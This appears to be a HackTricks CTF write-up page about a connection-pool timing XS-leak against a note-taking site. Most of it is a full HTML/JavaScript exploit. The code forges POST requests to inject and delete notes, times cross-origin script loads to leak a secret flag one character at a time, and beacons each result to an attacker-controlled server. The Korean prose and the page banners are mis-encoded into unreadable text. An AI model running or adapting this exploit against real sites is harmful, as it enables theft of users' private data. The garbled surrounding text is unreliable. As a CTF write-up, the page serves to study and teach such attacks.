Connection Pool by Destination Example
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
In this exploit, @terjanq๋ ๋ค์ ํ์ด์ง์ ์ธ๊ธ๋ ๋ฌธ์ ์ ๋ํ ๋ ๋ค๋ฅธ ํด๊ฒฐ์ฑ ์ ์ ์ํฉ๋๋ค:
Connection Pool by Destination Example
์ด exploit๊ฐ ์ด๋ป๊ฒ ์๋ํ๋์ง ์ดํด๋ณด๊ฒ ์ต๋๋ค:
- ๊ณต๊ฒฉ์๋ ๊ฐ๋ฅํ ํ ๋ง์
<imgํ๊ทธ๊ฐ ๋ก๋ฉ๋๋ **/js/purify.js**๋ฅผ ํฌํจํ ๋ ธํธ๋ฅผ ์ฃผ์ ํฉ๋๋ค(์๋ณธ์ ์ฐจ๋จํ๊ธฐ ์ํด 6๊ฐ ์ด์). - ๊ทธ๋ฐ ๋ค์, ๊ณต๊ฒฉ์๋ ์ธ๋ฑ์ค 1์ ๋ ธํธ๋ฅผ ์ ๊ฑฐํฉ๋๋ค.
- ๊ทธ ํ, ๊ณต๊ฒฉ์๋ [๋จ์ ์๋ ๋
ธํธ๋ก ๋ด์ด ํ์ด์ง์ ์ ๊ทผํ๊ฒ ๋ง๋ค๊ณ **
victim.com/js/purify.js**์ ์์ฒญ์ ๋ณด๋ ๋๋ค] ๊ทธ๋ฆฌ๊ณ ๊ทธ ์์ฒญ์ ์๊ฐ์ ์ธก์ ํฉ๋๋ค. - ์๊ฐ์ด ๋ ํฌ๋ฉด, ์ฃผ์ ์ด ๋จ์ ์๋ ๋ ธํธ์ ์์๊ณ , ์๊ฐ์ด ๋ ๋ฎ์ผ๋ฉด, ํ๋๊ทธ๊ฐ ๊ทธ ์์ ์์์ต๋๋ค.
Tip
์์งํ, ์คํฌ๋ฆฝํธ๋ฅผ ์ฝ์ผ๋ฉด์ ๊ณต๊ฒฉ์๊ฐ ๋ด์ด img ํ๊ทธ๋ฅผ ํธ๋ฆฌ๊ฑฐํ๊ธฐ ์ํด ํ์ด์ง๋ฅผ ๋ก๋ํ๊ฒ ๋ง๋๋ ๋ถ๋ถ์ ๋์ณค์ต๋๋ค. ์ฝ๋์์ ๊ทธ๋ฐ ๋ด์ฉ์ ๋ณด์ด์ง ์์ต๋๋ค.
<html>
<head>
<script>
const SITE_URL = "https://safelist.ctf.sekai.team/"
const PING_URL = "https://myserver"
function timeScript() {
return new Promise((resolve) => {
var x = document.createElement("script")
x.src =
"https://safelist.ctf.sekai.team/js/purify.js?" + Math.random()
var start = Date.now()
x.onerror = () => {
console.log(`Time: ${Date.now() - start}`) //Time request
resolve(Date.now() - start)
x.remove()
}
document.body.appendChild(x)
})
}
add_note = async (note) => {
let x = document.createElement("form")
x.action = SITE_URL + "create"
x.method = "POST"
x.target = "xxx"
let i = document.createElement("input")
i.type = "text"
i.name = "text"
i.value = note
x.appendChild(i)
document.body.appendChild(x)
x.submit()
}
remove_note = async (note_id) => {
let x = document.createElement("form")
x.action = SITE_URL + "remove"
x.method = "POST"
x.target = "_blank"
let i = document.createElement("input")
i.type = "text"
i.name = "index"
i.value = note_id
x.appendChild(i)
document.body.appendChild(x)
x.submit()
}
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms))
// }zyxwvutsrqponmlkjihgfedcba_
const alphabet = "zyxwvutsrqponmlkjihgfedcba_"
var prefix = "SEKAI{xsleakyay"
const TIMEOUT = 500
async function checkLetter(letter) {
// Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js
// Depending whether we found flag's letter it will either load the images or not.
// With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.
const payload =
`${prefix}${letter}` +
Array.from(Array(78))
.map((e, i) => `<img/src=/js/purify.js?${i}>`)
.join("")
await add_note(payload)
await sleep(TIMEOUT)
await timeScript()
await remove_note(1) //Now, only the note with the flag or with the injection existsh
await sleep(TIMEOUT)
const time = await timeScript() //Find out how much a request to the same origin takes
navigator.sendBeacon(PING_URL, [letter, time])
if (time > 100) {
return 1
}
return 0
}
window.onload = async () => {
navigator.sendBeacon(PING_URL, "start")
// doesnt work because we are removing flag after success.
// while(1){
for (const letter of alphabet) {
if (await checkLetter(letter)) {
prefix += letter
navigator.sendBeacon(PING_URL, prefix)
break
}
}
// }
}
</script>
</head>
<body></body>
</html>
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


